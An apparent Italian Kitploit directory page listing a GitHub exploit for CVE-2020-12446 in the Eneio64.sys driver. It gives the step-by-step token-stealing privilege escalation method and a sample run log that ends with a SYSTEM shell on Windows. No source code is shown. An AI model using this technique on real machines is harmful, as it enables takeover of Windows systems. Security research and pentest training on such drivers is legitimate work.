Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Eneio64-LPE — Un Exploit per CVE-2020-12446 Eneio64.sys. Usa superfetch per la traduzione degli indirizzi. | Kitploit
Strumenti/GitHubGitHub/s1lkys/eneio64-lpe
Escalation di PrivilegiExploitApprendimento e FormazioneBinary Exploitation
GitHubs1lkys/eneio64-lpe

Eneio64-LPE

Un Exploit per CVE-2020-12446 Eneio64.sys. Usa superfetch per la traduzione degli indirizzi.

Vedi Repository
35 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
  1. Apre un handle al driver vulnerabile
  2. Mappa la memoria fisica nello spazio utente
  3. Apre un handle al processo System
  4. Interroga la tabella SystemHandleInformation del processo corrente per l'handle di sistema ottenuto, divulgando il suo indirizzo EPROCESS.
  5. Attraversa il flink di ActiveProcessLinks di System EPROCESS fino a trovare il PID del processo corrente.
  6. Applica una patch al token del processo corrente con il token del processo System
  7. Genera un nuovo processo powershell.

Utilizza il metodo superfetch per la traduzione degli indirizzi virtuali in fisici invece di divulgare CR3 e attraversare le tabelle delle pagine.

Testato su Win11 21H2

root@kitploit:~
C:\Users\Public>.\Eneio64-LPE.exe
[+] Total physical memory: ~0x7fef2000 bytes
[+] Mapped physical memory at 000002A3A4FC0000
[+] Leaking System EPROCESS
[+] Opened handle to SYSTEM process (PID 4)
>    Current PID:  3932
>    Handle value: 0x5c
[+] Querying SystemHandleInformation table of current process
[+] Handle table queried successfully
>    Buffer size:    1048576 bytes
>    Resize rounds:  15
>    Total handles:  29211
[+] Searching for handle 0x5c in handle table
[+] Match found at index 29183 / 29211
>    PID:                      3932
>    Handle:                   0x5c
>    Object (System EPROCESS): 0xffff858ca1885040
[+] Searching for current process token. Walking ActiveProcessLinks from System Flink (System EPROCESS + 0x448) to current PID
[+] Next Flink addr - 0x448 = Next EPROCESS
[+] Found current process (PID 3932) token at [0x72cd25f8]
[+] Patching current token with SYSTEM token
[!] ==== Flink addr of current PID - EPROCESS ActiveProcessLinks Offset (0x448) + EPROCESS Token Offset (0x4B8) = Current Token ====
[+] Token replaced.
Microsoft Windows [Version 10.0.20348.2849]
(c) Microsoft Corporation. All rights reserved.

C:\Users\Public>whoami
nt authority\system

Solo per uso educativo!

Scarica lo strumento